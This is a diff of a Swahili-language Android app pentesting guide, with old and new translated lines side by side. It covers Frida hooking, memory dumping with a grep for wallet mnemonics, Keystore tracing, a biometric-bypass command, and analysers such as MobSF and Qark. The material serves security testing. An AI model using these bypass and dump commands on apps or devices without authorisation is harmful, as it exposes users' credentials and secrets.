Ni muhimu pia kutafuta vulnerabilities za kawaida za web ndani ya application. Maelezo ya kina juu ya utambuzi na kupunguza vulnerabilities hizi hayamo katika muhtasari huu lakini yameelezwa kwa kina mahali pengine.
Ni muhimu pia kutafuta udhaifu wa kawaida wa wavuti ndani ya programu. Maelezo ya kina juu ya kutambua na kupunguza udhaifu hivi ni kubwa kuliko muhtasari huu lakini yameelezewa kwa undani mahali pengine.
### Frida
[Frida](https://www.frida.re) is a dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.\
**Unaweza kufikia application inayokimbia na ku-hook methods wakati wa runtime ili kubadilisha tabia, kubadilisha values, kutoa values, kuendesha code tofauti...**\
Kama unataka pentest Android applications ni muhimu ujue jinsi ya kutumia Frida.
[Frida](https://www.frida.re) ni toolkit ya instrumentation ya dynamic kwa waendelezaji, wachambuzi wa reverse-engineering, na watafiti wa usalama.\
**Unaweza kufikia application inayokwama na ku-hook methods wakati wa runtime ili kubadilisha tabia, kubadilisha thamani, kutoa thamani, kuendesha code tofauti...**\
Ikiwa unataka kufanya pentest za Android applications unahitaji kujua jinsi ya kutumia Frida.
- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Some "GUI" for actions with Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection is great to automate the use of Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- You can find some Awesome Frida scripts here: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Try to bypass anti-debugging / anti-frida mechanisms loading Frida as in indicated in [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (tool [linjector](https://github.com/erfur/linjector-rs))
- Jifunze jinsi ya kutumia Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Baadhi ya "GUI" kwa vitendo na Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection ni nzuri kuendesha otomatiki matumizi ya Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- Unaweza kupata baadhi ya Awesome Frida scripts hapa: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Jaribu kuepuka mekanismi za anti-debugging / anti-frida kwa kuanzisha Frida kama inavyoelezwa katika [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (zana [linjector](https://github.com/erfur/linjector-rs))
#### Anti-instrumentation & SSL pinning bypass workflow
@ -526,9 +530,9 @@ android-anti-instrumentation-and-ssl-pinning-bypass.md
### **Dump Memory - Fridump**
Kagua kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi, kama passwords au mnemonics.
Angalia kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi kama passwords au mnemonics.
Using [**Fridump3**](https://github.com/rootbsd/fridump3) you can dump the memory of the app with:
Ukijumuisha [**Fridump3**](https://github.com/rootbsd/fridump3) unaweza kufanya dump ya memory ya app kwa:
```bash
# With PID
python3 fridump3.py -u <PID>
@ -541,116 +545,116 @@ Hii ita-dump kumbukumbu katika folda ./dump, na hapo unaweza kutumia grep kwa ki
```bash
strings * | grep -E "^[a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+$"
```
### **Taarifa nyeti katika Keystore**
### **Data nyeti katika Keystore**
Katika Android Keystore ni mahali pazuri zaidi pa kuhifadhi taarifa nyeti, hata hivyo, kwa idhini za kutosha bado ni **possible to access it**. Kwa kuwa applications mara nyingi huzihifadhi hapa **sensitive data in clear text**, pentests zinapaswa kuichunguza kwani kama root user au mtu mwenye ufikiaji wa kimwili kwa kifaa anaweza kuiba data hii.
Katika Android, Keystore ni mahali pazuri kuhifadhi data nyeti, hata hivyo, kwa ruhusa za kutosha bado inawezekana kuifikia. Kwa kuwa applications zinaweza kuhifadhi hapa sensitive data in clear text, pentests zinapaswa kuangalia hilo kwa mtumiaji root au mtu mwenye ufikiaji wa kimwili wa kifaa ambaye anaweza kuiba data hiyo.
Hata kama app imehifadhi data kwenye keystore, data inapaswa kuwa encrypted.
Hata kama app ilihifadhi data katika keystore, data hiyo inapaswa kuwa encrypted.
Ili kufikia data ndani ya keystore unaweza kutumia Frida script hii: [https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js](https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js)
Ili kufikia data ndani ya keystore unaweza kutumia script ya Frida: [https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js](https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js)
```bash
frida -U -f com.example.app -l frida-scripts/tracer-cipher.js
```
### **Fingerprint/Biometrics Bypass**
Kutumia Frida script ifuatayo kunaweza kuwa inawezekana **bypass fingerprint authentication** ambayo Android applications zinaweza kufanya ili **kulinda maeneo fulani nyeti:**
Kwa kutumia Frida script ifuatayo inaweza kuwa inawezekana **bypass fingerprint authentication** Android applications zinaweza kufanya ili **kulinda maeneo fulani nyeti:**
```bash
frida --codeshare krapgras/android-biometric-bypass-update-android-11 -U -f <app.package>
```
### **Picha za Mandharinyuma**
Unapoiweka programu katika mandharinyuma, Android huhifadhi **snapshot ya programu** ili inaporudishwa mbele inaanza kupakia picha hiyo kabla ya app, hivyo inaonekana kama app ilipakia haraka zaidi.
Unapoweka application kwa mandharinyuma, Android huhifadhi **snapshot ya application** ili inaporejeshwa mbele inaanza kupakia picha kabla ya app, hivyo inaonekana kama app ilipakia haraka.
Hata hivyo, ikiwa snapshot hii ina **taarifa nyeti**, mtu mwenye ufikiaji wa snapshot anaweza **kuiba taarifa hiyo** (kumbuka unahitaji root ili kuifikia).
Snapshots kawaida huhifadhiwa hapa: **`/data/system_ce/0/snapshots`**
Snapshots kawaida huhifadhiwa karibu: **`/data/system_ce/0/snapshots`**
Android inatoa njia ya **kuzuia kunakiliwa kwa screenshot kwa kuweka parameter ya layout FLAG_SECURE**. Kwa kutumia flag hii, yaliyomo kwenye dirisha yanachukuliwa kuwa salama, na kuzuia yaonekana katika screenshots au kuonekana kwenye displays zisizo salama.
Android inatoa njia ya **kuzuia the screenshot capture kwa kuweka parameter ya layout FLAG_SECURE**. Kwa kutumia flag hii, maudhui ya window yanachukuliwa kuwa salama, kuyazuia kuonekana kwenye screenshots au kuonekana kwenye non-secure displays.
```bash
getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE);
```
### **Android Application Analyzer**
Chombo hiki kinaweza kukusaidia kusimamia zana mbalimbali wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
Kifaa hiki kinaweza kukusaidia kusimamia zana mbalimbali wakati wa dynamic analysis: [https://github.com/NotSoSecure/android_application_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
### Intent Injection
Developers mara nyingi hufanya proxy components kama activities, services, na broadcast receivers zinazoshughulikia Intents hizi na kuzipitisha kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Waundaji mara nyingi huunda proxy components kama activities, services, na broadcast receivers ambazo zinashughulikia Intent hizi na kuzipitisha kwa methods kama `startActivity(...)` au `sendBroadcast(...)`, jambo ambalo linaweza kuwa hatari.
Hatari iko kwenye kuruhusu attackers kuanzisha non-exported app components au kupata access kwa sensitive content providers kwa kupindisha Intents hizi. Mfano muhimu ni component ya `WebView` kubadilisha URLs kuwa Intent objects kupitia `Intent.parseUri(...)` na kisha kuzitekeleza, jambo ambalo linaweza kusababisha malicious Intent injections.
Hatari iko katika kuruhusu attackers kuanzisha non-exported app components au kupata access kwa sensitive content providers kwa kupelekewa Intent hizi kwa njia isiyo sahihi. Mfano wa kuzingatia ni component ya `WebView` kubadilisha URLs kuwa `Intent` objects kupitia `Intent.parseUri(...)` kisha kuziendesha, jambo ambalo linaweza kusababisha malicious Intent injections.
### Essential Takeaways
### Vidokezo Muhimu
- **Intent Injection** ni sawa na tatizo la Open Redirect kwenye web.
- Exploits zinahusisha kupitisha `Intent` objects kama extras, ambazo zinaweza kualikwa upya ili kutekeleza operations zisizo salama.
- **Intent Injection** ni sawa na Open Redirect ya web.
- Exploits involve passing `Intent` objects as extras, which can be redirected to execute unsafe operations.
- Inaweza kufichua non-exported components na content providers kwa attackers.
- Ubadilishaji wa URL kwa Intent kwenye `WebView` unaweza kuwezesha actions zisizokusudiwa.
- `WebView`s URL to `Intent` conversion inaweza kuwezesha vitendo visivyotarajiwa.
### Android Client Side Injections and others
Labda unafahamu aina hizi za vulnerabilities kutoka Web. Lazima uwe waangalifu hasa na vulnerabilities hizi katika Android application:
Huenda unajua aina hizi za udhaifu kutoka Web. Lazima uwe makini hasa na udhaifu hizi katika application ya Android:
- **SQL Injection:** Unaposhughulika na dynamic queries au Content-Providers hakikisha unatumia parameterized queries.
- **JavaScript Injection (XSS):** Thibitisha kwamba JavaScript na Plugin support zimezimwa kwa WebViews yoyote (zimeteuliwa kuwa disabled by default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews zinapaswa kuwa na access kwa file system zimezima (zimeteuliwa kuwa enabled by default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: Katika visa kadhaa wakati android application inapomaliza session cookie haifutwi au inaweza hata kuokolewa kwenye disk
- **SQL Injection:** When dealing with dynamic queries or Content-Providers ensure you are using parameterized queries.
- **JavaScript Injection (XSS):** Verify that JavaScript and Plugin support is disabled for any WebViews (disabled by default). [More info here](webview-attacks.md#javascript-enabled).
- **Local File Inclusion:** WebViews should have access to the file system disabled (enabled by default) - `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
- **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
- [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/index.html#cookies-flags)
---
## Automatic Analysis
## Uchambuzi Otomatiki
### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
**Static analysis**
**Uchambuzi wa statiki**
![](<../../images/image (866).png>)
**Vulnerability assessment of the application** kwa kutumia frontend nzuri ya web. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa environment).
**Tathmini ya udhaifu ya programu** kwa kutumia frontend nzuri ya wavuti. Unaweza pia kufanya dynamic analysis (lakini unahitaji kuandaa mazingira).
```bash
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
```
Note that MobSF can analyse **Android**(apk)**, IOS**(ipa) **and Windows**(apx) applications (_Windows applications must be analyzed from a MobSF installed in a Windows host_).\
Pia, ikiwa utaunda faili la **ZIP** lenye source code ya app ya **Android** au **IOS** (nenda kwenye root folder ya application, chagua kila kitu na unda ZIPfile), itauweza kuchambua pia.
Kumbuka kwamba MobSF inaweza kuchambua **Android**(apk)**, IOS**(ipa) **and Windows**(apx) applications (_Windows applications must be analyzed from a MobSF installed in a Windows host_).\
Pia, ikiwa utaunda faili ya **ZIP** yenye msimbo wa chanzo wa app ya **Android** au **IOS** (nenda kwenye root folder ya application, chagua kila kitu na unda ZIPfile), itaweza kuichambua pia.
MobSF pia inakuwezesha kufanya **diff/Compare** ya analysis na kuunganisha **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuifanya iwe enabled: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi the **hash** itapakiwa badala ya faili.
MobSF pia inakuwezesha kufanya **diff/Compare** za uchambuzi na kuunganisha **VirusTotal** (utahitaji kuweka API key yako katika _MobSF/settings.py_ na kuiwezesha: `VT_ENABLED = TRUE` `VT_API_KEY = <Your API key>` `VT_UPLOAD = TRUE`). Unaweza pia kuweka `VT_UPLOAD` kuwa `False`, basi **hash** itaupload badala ya faili.
### Assisted Dynamic analysis with MobSF
**MobSF** inaweza pia kuwa msaada mkubwa kwa **dynamic analysis** kwenye **Android**, lakini katika kesi hiyo utahitaji kusanisha MobSF na **genymotion** kwenye host yako (VM au Docker haitafanya kazi). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
**MobSF** pia inaweza kuwa msaada mkubwa kwa ajili ya **dynamic analysis** katika **Android**, lakini katika kesi hiyo utahitaji kusakinisha MobSF na **genymotion** kwenye host yako (a VM or Docker won't work). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_\
The **MobSF dynamic analyser** inaweza:
- **Dump application data** (URLs, logs, clipboard, screenshots ulizofanya mwenyewe, screenshots zilizofanywa na "**Exported Activity Tester**", emails, SQLite databases, XML files, na faili nyingine zilizoundwa). Haya yote hufanywa moja kwa moja isipokuwa screenshots, lazima ubofye wakati unataka screenshot au lazima ubofye "**Exported Activity Tester**" ili kupata screenshots za exported activities zote.
- **Dump application data** (URLs, logs, clipboard, screenshots made by you, screenshots made by "**Exported Activity Tester**", emails, SQLite databases, XML files, and other created files). Yote haya hufanywa kiotomatiki isipokuwa screenshots; unahitaji kubonyeza wakati unapotaka screenshot au unahitaji kubonyeza "**Exported Activity Tester**" kupata screenshots za exported activities zote.
- Capture **HTTPS traffic**
- Use **Frida** to obtain **runtime** **information**
Kutoka kwenye Android **versions > 5**, itaanzisha **Frida** kiotomatiki na itaweka global **proxy** settings ili **capture** traffic. Itakamata traffic tu kutoka kwa application inayojaribiwa.
From android **versions > 5**, it will **automatically start Frida** and will set global **proxy** settings to **capture** traffic. It will only capture traffic from the tested application.
**Frida**
Kwa default, itatumia baadhi ya Frida Scripts ili **bypass SSL pinning**, **root detection** na **debugger detection** na pia **monitor interesting APIs**.\
MobSF pia inaweza **invoke exported activities**, kuchukua **screenshots** zao na **kuzi hifadhi** kwa ajili ya report.
By default, it will also use some Frida Scripts to **bypass SSL pinning**, **root detection** and **debugger detection** and to **monitor interesting APIs**.\
MobSF can also **invoke exported activities**, grab **screenshots** of them and **save** them for the report.
Ili **kuanza** dynamic testing bonyeza button ya kijani: "**Start Instrumentation**". Bonyeza "**Frida Live Logs**" kuona logs zinazozalishwa na Frida scripts na "**Live API Monitor**" kuona invoke zote za hooked methods, arguments zilizotumika na returned values (hii itaonekana baada ya kubofya "Start Instrumentation").\
MobSF pia inakuwezesha kupakia Frida scripts zako mwenyewe (kutuma matokeo ya Frida scripts zako kwa MobSF tumia function `send()`). Pia ina **several pre-written scripts** ambazo unaweza kupakia (unaweza kuongeza zaidi katika `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), chagua tu, bonyeza "**Load**" na kisha "**Start Instrumentation**" (utaweza kuona logs za script hizo ndani ya "**Frida Live Logs**").
To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\
MobSF also allows you to load your own **Frida scripts** (to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**").
![](<../../images/image (419).png>)
Zaidi ya hayo, una baadhi ya Auxiliary Frida functionalities:
Moreover, you have some Auxiliary Frida functionalities:
- **Enumerate Loaded Classes**: Itachapisha classes zote zilizopakiwa
- **Capture Strings**: Itachapisha strings zote zinazopigwa capture wakati wa kutumia application (inatoa noise nyingi)
- **Capture String Comparisons**: Inaweza kuwa muhimu sana. Itaonyesha **strings mbili zinazolinganishwa** na kama result ilikuwa True au False.
- **Enumerate Class Methods**: Weka jina la class (kama "java.io.File") na itachapisha methods zote za class hiyo.
- **Search Class Pattern**: Tafuta classes kwa pattern
- **Trace Class Methods**: **Trace** class nzima (ona inputs na outputs za methods zote za class). Kumbuka kwamba kwa default MobSF inafuatilia baadhi ya Android Api methods zinazovutia.
- **Enumerate Loaded Classes**: It will print all the loaded classes
- **Capture Strings**: It will print all the capture strings while using the application (super noisy)
- **Capture String Comparisons**: Could be very useful. It will **show the 2 strings being compared** and if the result was True or False.
- **Enumerate Class Methods**: Put the class name (like "java.io.File") and it will print all the methods of the class.
- **Search Class Pattern**: Search classes by pattern
- **Trace Class Methods**: **Trace** a **whole class** (see inputs and outputs of all methods of th class). Remember that by default MobSF traces several interesting Android Api methods.
Mara baada ya kuchagua module ya auxiliary unayotaka kutumia lazima ubofye "**Start Intrumentation**" na utaona outputs zote ndani ya "**Frida Live Logs**".
Once you have selected the auxiliary module you want to use you need to press "**Start Intrumentation**" and you will see all the outputs in "**Frida Live Logs**".
**Shell**
MobSF pia inakuleta shell yenye baadhi ya amri za **adb**, amri za **MobSF**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zinazovutia:
Mobsf pia inakuja na shell yenye baadhi ya amri za **adb**, **MobSF commands**, na amri za kawaida za **shell** chini ya ukurasa wa dynamic analysis. Baadhi ya amri zenye kuvutia:
```bash
help
shell ls
@ -661,32 +665,32 @@ receivers
```
**Vifaa vya HTTP**
Wakati trafiki ya HTTP inapokamatwa unaweza kuona muonekano mbaya wa trafiki iliyokamatwa kwenye kitufe cha chini "**HTTP(S) Traffic**" au muonekano mzuri kwenye kitufe cha kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _power on Burp -->_ _turn off Intercept --> in MobSB HTTPTools select the request_ --> press "**Send to Fuzzer**" --> _select the proxy address_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Wakati traffic ya HTTP inapokamatwa unaweza kuona muonekano mbaya wa traffic iliyokamatwa kwenye kitufe cha chini "**HTTP(S) Traffic**" au muonekano mzuri kwenye kitufe cha kijani "**Start HTTPTools**". Kutoka chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\
Ili kufanya hivyo, _amsha Burp -->_ _zima Intercept --> katika MobSB HTTPTools chagua request_ --> bonyeza "**Send to Fuzzer**" --> _chagua anwani ya proxy_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)).
Baada ya kumaliza dynamic analysis na MobSF unaweza kubofya "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu.
Mara utakapomaliza uchambuzi wa dynamic na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta vulnerabilities.
> [!TIP]
> Baada ya kufanya dynamic analysis na MobSF mipangilio ya proxy inaweza kuwa imechafuka na hautaweza kuirekebisha kupitia GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
> Baada ya kufanya uchambuzi wa dynamic na MobSF mipangilio ya proxy inaweza kuwa imechanganikwa na hutaweza kuirekebisha kutoka GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya:
>
> ```
> adb shell settings put global http_proxy :0
> ```
### Uchambuzi wa Dynamic Ulio kusaidiwa na Inspeckage
### Assisted Dynamic Analysis with Inspeckage
Unaweza kupata zana kutoka [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
Zana hii itatumia baadhi ya **Hooks** kukujulisha **kinachoendelea katika application** huku ukifanya **dynamic analysis**.
Unaweza kupata tool hii kutoka kwa [**Inspeckage**](https://github.com/ac-pm/Inspeckage).\
Chombo hiki kinatumia baadhi ya **Hooks** kukujulisha **kinachotokea kwenye application** wakati unafanya **dynamic analysis**.
### [Yaazhini](https://www.vegabird.com/yaazhini/)
Hii ni **zana nzuri za kufanya static analysis kwa GUI**
Hii ni **tool nzuri ya kufanya static analysis kwa GUI**
![](<../../images/image (741).png>)
### [Qark](https://github.com/linkedin/qark)
Zana hii imeundwa kutafuta udhaifu mbalimbali zinazohusiana na **security** za Android application, iwe katika **source code** au **packaged APKs**. Zana pia ina uwezo wa kuunda "Proof-of-Concept" deployable APK na **ADB commands**, ili ku-exploit baadhi ya udhaifu uliopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
Tool hii imeundwa kutafuta aina mbalimbali za **security related Android application vulnerabilities**, iwe katika **source code** au **packaged APKs**. Tool pia ina uwezo wa **kuunda "Proof-of-Concept" deployable APK** na **ADB commands**, ili ku-exploit baadhi ya vulnerabilities zilizopatikana (Exposed activities, intents, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani.
```bash
pip3 install --user qark # --user is only needed if not using a virtualenv
qark --apk path/to/my.apk
@ -695,20 +699,20 @@ qark --java path/to/specific/java/file.java
```
### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git)
- Inaonyesha faili zote zilizotolewa kwa rejea rahisi
- Hufanya decompile kwa faili za APK kwa njia ya otomatiki hadi muundo wa Java na Smali
- Huchambua AndroidManifest.xml kwa ajili ya udhaifu na tabia za kawaida
- Uchambuzi wa msimbo wa chanzo wa static kwa ajili ya udhaifu na tabia za kawaida
- Inaonyesha mafaili yote yaliyotolewa kwa marejeo rahisi
- Moja kwa moja decompile APK files hadi format ya Java na Smali
- Huchambua AndroidManifest.xml kwa common vulnerabilities na tabia
- Static source code analysis kwa common vulnerabilities na tabia
- Taarifa za kifaa
- na mengi zaidi
- na zaidi
```bash
reverse-apk relative/path/to/APP.apk
```
### [SUPER Android Analyzer](https://github.com/SUPERAndroidAnalyzer/super)
SUPER ni programu ya mstari wa amri inayoweza kutumika kwenye Windows, MacOS X na Linux, ambayo inachambua faili za _.apk_ kutafuta vulnerabilities. Inafanya hivyo kwa kuzipakua APKs na kutumia mfululizo wa kanuni kugundua vulnerabilities hizo.
SUPER ni programu ya command-line inayoweza kutumiwa kwenye Windows, MacOS X na Linux, ambayo inachambua faili za _.apk_ ili kutafuta vulnerabilities. Inafanya hivyo kwa ku-decompress APKs na kutumia mfululizo wa sheria ili kugundua vulnerabilities hizo.
Kanuni zote ziko katika faili la `rules.json`, na kila kampuni au mjaribu anaweza kuunda kanuni zao ili kuchambua wanazohitaji.
Sheria zote ziko kwenye faili `rules.json`, na kila kampuni au mjaribu anaweza kuunda sheria zake za kuchambua wanachohitaji.
Pakua binaries za hivi karibuni kutoka kwenye [download page](https://superanalyzer.rocks/download.html)
```
@ -718,9 +722,9 @@ super-analyzer {apk_file}
![](<../../images/image (297).png>)
StaCoAn ni zana ya **crossplatform** inayowasaidia developers, bugbounty hunters na ethical hackers kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye mobile applications.
StaCoAn ni zana ya **crossplatform** inayosaidia waendelezaji, bugbounty hunters na ethical hackers kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye programu za rununu.
Mfumo ni kwamba una-vuta na kuacha faili ya programu yako ya simu (faili ya .apk au .ipa) kwenye programu ya StaCoAn na itaunda ripoti ya kuona na rahisi kubeba kwako. Unaweza kubadilisha mipangilio na wordlists ili kupata uzoefu uliobinafsishwa.
Dhana ni kwamba unavuta na kuachilia faili ya programu yako ya rununu (faili ya .apk au .ipa) kwenye programu ya StaCoAn na itazalisha ripoti ya kuona na inayobebeka kwako. Unaweza kubadilisha mipangilio na wordlists ili kupata uzoefu uliobinafsishwa.
Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
@ -728,7 +732,7 @@ Download[ latest release](https://github.com/vincentcox/StaCoAn/releases):
```
### [AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework)
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kugundua udhaifu za usalama zinazoweza kuwepo katika programu za Android.\
AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kugundua udhaifu za kiusalama zinazowezekana katika programu za Android.\
[Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases)
```
python androbugs.py -f [APK file]
@ -736,11 +740,11 @@ androbugs.exe -f [APK file]
```
### [Androwarn](https://github.com/maaaaz/androwarn)
**Androwarn** ni zana ambalo lengo lake kuu ni kugundua na kuwaonya mtumiaji kuhusu tabia hatari zinazoweza kutengenezwa na programu ya Android.
**Androwarn** ni zana ambayo lengo lake kuu ni kugundua na kuonya mtumiaji kuhusu tabia hatarishi zinazoweza kufanywa na programu ya Android.
Ugundaji hufanywa kwa kupitia **static analysis** ya bytecode ya programu ya Dalvik, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Utambuzi hufanywa kwa kutumia **static analysis** ya bytecode ya Dalvik ya programu, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard).
Zana hii inaangalia **tabia za kawaida za programu "mbaya"** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
Zana hii inatafuta **tabia za kawaida za programu "mbaya"** kama: Telephony identifiers exfiltration, Audio/video flow interception, PIM data modification, Arbitrary code execution...
```
python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
```
@ -748,36 +752,36 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
![](<../../images/image (595).png>)
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni zana inayoweka pamoja zana zinazotumika mara kwa mara za mobile application reverse engineering na analysis, kusaidia katika kujaribu mobile applications dhidi ya OWASP mobile security threats. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa mobile application developers na security professionals.
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. Ni zana inayokusanya zana zinazotumika mara kwa mara za mobile application reverse engineering and analysis, kusaidia katika kujaribu programu za simu dhidi ya vitisho vya OWASP mobile security. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa watengenezaji wa programu za simu na wataalamu wa usalama.
It is able to:
Ina uwezo wa:
- Extract Java and Smali code using different tools
- Analyze APKs using: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
- Extract private information from the APK using regexps.
- Analyze the Manifest.
- Analyze found domains using: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
- Kutoa Java na Smali code kwa kutumia zana mbalimbali
- Fanya uchambuzi wa APKs kwa kutumia: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD)
- Kutoa taarifa za kibinafsi kutoka kwenye APK kwa kutumia regexps.
- Chunguza Manifest.
- Chunguza domains zilizopatikana kwa kutumia: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) and [whatweb](https://github.com/urbanadventurer/WhatWeb)
- Deobfuscate APK via [apk-deguard.com](http://www.apk-deguard.com)
### Koodous
Inayofaa kutambua malware: [https://koodous.com/](https://koodous.com/)
Inafaa kugundua malware: [https://koodous.com/](https://koodous.com/)
## Obfuscating/Deobfuscating code
Kumbuka kwamba, kulingana na service na configuration unayotumia kuobfuscate the code, secrets zinaweza au zisiwe obfuscated.
Kumbuka kwamba, kulingana na huduma na usanidi unaotumika kuficha msimbo, siri zinaweza kuwa zimefichwa au siyo.
### [ProGuard](<https://en.wikipedia.org/wiki/ProGuard_(software)>)
From [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** is an open source command-line tool that shrinks, optimizes and obfuscates Java code. It is able to optimize bytecode as well as detect and remove unused instructions. ProGuard is free software and is distributed under the GNU General Public License, version 2.
Kutoka [Wikipedia](<https://en.wikipedia.org/wiki/ProGuard_(software)>): **ProGuard** ni zana ya open source ya command-line inayopunguza, kuboresha na kuficha Java code. Ina uwezo wa kuboresha bytecode pamoja na kugundua na kuondoa maelekezo yasiyotumika. ProGuard ni programu ya bure na imesambazwa chini ya GNU General Public License, version 2.
ProGuard is distributed as part of the Android SDK and runs when building the application in release mode.
ProGuard inasambazwa kama sehemu ya Android SDK na hufanya kazi wakati wa kujenga application katika release mode.
### [DexGuard](https://www.guardsquare.com/dexguard)
Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html)
Pata mwongozo hatua kwa hatua wa ku-deobfuscate apk katika [https://blog.lexfo.fr/dexguard.html](https://blog.lexfo.fr/dexguard.html)
(From that guide) Last time we checked, the Dexguard mode of operation was:
(Kulingana na mwongozo huo) Wakati wa mwisho tulipopima, mode ya utekelezaji ya Dexguard ilikuwa:
- load a resource as an InputStream;
- feed the result to a class inheriting from FilterInputStream to decrypt it;
@ -789,29 +793,29 @@ Find a step-by-step guide to deobfuscate the apk in [https://blog.lexfo.fr/dexgu
**DeGuard reverses the process of obfuscation performed by Android obfuscation tools. This enables numerous security analyses, including code inspection and predicting libraries.**
